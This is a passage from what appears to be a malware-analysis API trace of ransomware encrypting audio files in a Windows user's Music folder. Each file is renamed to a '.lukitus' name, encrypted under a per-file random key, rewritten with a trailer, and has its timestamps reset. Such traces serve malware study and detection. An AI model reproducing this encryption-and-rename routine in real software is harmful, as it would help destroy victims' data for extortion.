hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.623] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\SSm4dCFGv.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ssm4dcfgv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.623] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\SSm4dCFGv.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ssm4dcfgv.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-0B96A441-A5B4A8D7B326.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-0b96a441-a5b4a8d7b326.lukitus"), dwFlags=0x9) returned 1 [0108.625] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.625] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.630] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xb945, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xb945, lpOverlapped=0x0) returned 1 [0108.630] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.630] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xb945, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xb945, lpOverlapped=0x0) returned 1 [0108.631] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.631] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64c53770, dwHighDateTime=0x1d31760)) [0108.631] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.631] FlushFileBuffers (hFile=0x328) returned 1 [0108.634] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\ttLID7ogL6LUJu1L5.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ttlid7ogl6luju1l5.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a04a260, ftCreationTime.dwHighDateTime=0x1d2f89b, ftLastAccessTime.dwLowDateTime=0x5a03d740, ftLastAccessTime.dwHighDateTime=0x1d2f60b, ftLastWriteTime.dwLowDateTime=0x5a03d740, ftLastWriteTime.dwHighDateTime=0x1d2f60b, nFileSizeHigh=0x0, nFileSizeLow=0x145f6)) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.635] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\ttLID7ogL6LUJu1L5.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ttlid7ogl6luju1l5.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.636] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\ttLID7ogL6LUJu1L5.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\ttlid7ogl6luju1l5.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-F670BB2A-DBB903142DC9.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-f670bb2a-dbb903142dc9.lukitus"), dwFlags=0x9) returned 1 [0108.637] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.637] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.642] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x145f6, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x145f6, lpOverlapped=0x0) returned 1 [0108.643] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.643] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x145f6, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x145f6, lpOverlapped=0x0) returned 1 [0108.643] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64c798d0, dwHighDateTime=0x1d31760)) [0108.643] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.643] FlushFileBuffers (hFile=0x328) returned 1 [0108.646] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\v6Xlq.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\v6xlq.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce052520, ftCreationTime.dwHighDateTime=0x1d305cb, ftLastAccessTime.dwLowDateTime=0x3da35b00, ftLastAccessTime.dwHighDateTime=0x1d2fb35, ftLastWriteTime.dwLowDateTime=0x3da35b00, ftLastWriteTime.dwHighDateTime=0x1d2fb35, nFileSizeHigh=0x0, nFileSizeLow=0x7534)) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.646] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.647] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.647] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.647] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\v6Xlq.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\v6xlq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.647] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\v6Xlq.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\v6xlq.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-69CD54EB-8041B408A46D.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-69cd54eb-8041b408a46d.lukitus"), dwFlags=0x9) returned 1 [0108.648] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.648] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.653] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x7534, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x7534, lpOverlapped=0x0) returned 1 [0108.653] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.653] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x7534, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x7534, lpOverlapped=0x0) returned 1 [0108.654] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.654] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64c9fa30, dwHighDateTime=0x1d31760)) [0108.654] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.654] FlushFileBuffers (hFile=0x328) returned 1 [0108.659] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\VDux-7HT2lWMCS_sfY1E.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\vdux-7ht2lwmcs_sfy1e.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf20e5d00, ftCreationTime.dwHighDateTime=0x1d2f5e1, ftLastAccessTime.dwLowDateTime=0xe50be310, ftLastAccessTime.dwHighDateTime=0x1d2f97f, ftLastWriteTime.dwLowDateTime=0xe50be310, ftLastWriteTime.dwHighDateTime=0x1d2f97f, nFileSizeHigh=0x0, nFileSizeLow=0x5b96)) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.659] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\VDux-7HT2lWMCS_sfY1E.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\vdux-7ht2lwmcs_sfy1e.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.659] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\VDux-7HT2lWMCS_sfY1E.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\vdux-7ht2lwmcs_sfy1e.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-25C14B11-AF52ACE93C08.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-25c14b11-af52ace93c08.lukitus"), dwFlags=0x9) returned 1 [0108.661] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.661] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.666] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x5b96, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x5b96, lpOverlapped=0x0) returned 1 [0108.666] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.666] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x5b96, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x5b96, lpOverlapped=0x0) returned 1 [0108.667] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.667] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64cc5b90, dwHighDateTime=0x1d31760)) [0108.667] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.667] FlushFileBuffers (hFile=0x328) returned 1 [0108.670] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\wiwYP97gesozht.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\wiwyp97gesozht.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43ea16c0, ftCreationTime.dwHighDateTime=0x1d2fd88, ftLastAccessTime.dwLowDateTime=0x732215b0, ftLastAccessTime.dwHighDateTime=0x1d2fa35, ftLastWriteTime.dwLowDateTime=0x732215b0, ftLastWriteTime.dwHighDateTime=0x1d2fa35, nFileSizeHigh=0x0, nFileSizeLow=0x18cdc)) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.670] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.671] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.671] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.671] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.671] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.671] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.671] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.671] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\wiwYP97gesozht.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\wiwyp97gesozht.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.671] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\wiwYP97gesozht.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\wiwyp97gesozht.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-63BEBF75-6E4F6B50A466.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-63bebf75-6e4f6b50a466.lukitus"), dwFlags=0x9) returned 1 [0108.672] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.672] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.677] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x18cdc, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x18cdc, lpOverlapped=0x0) returned 1 [0108.678] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, 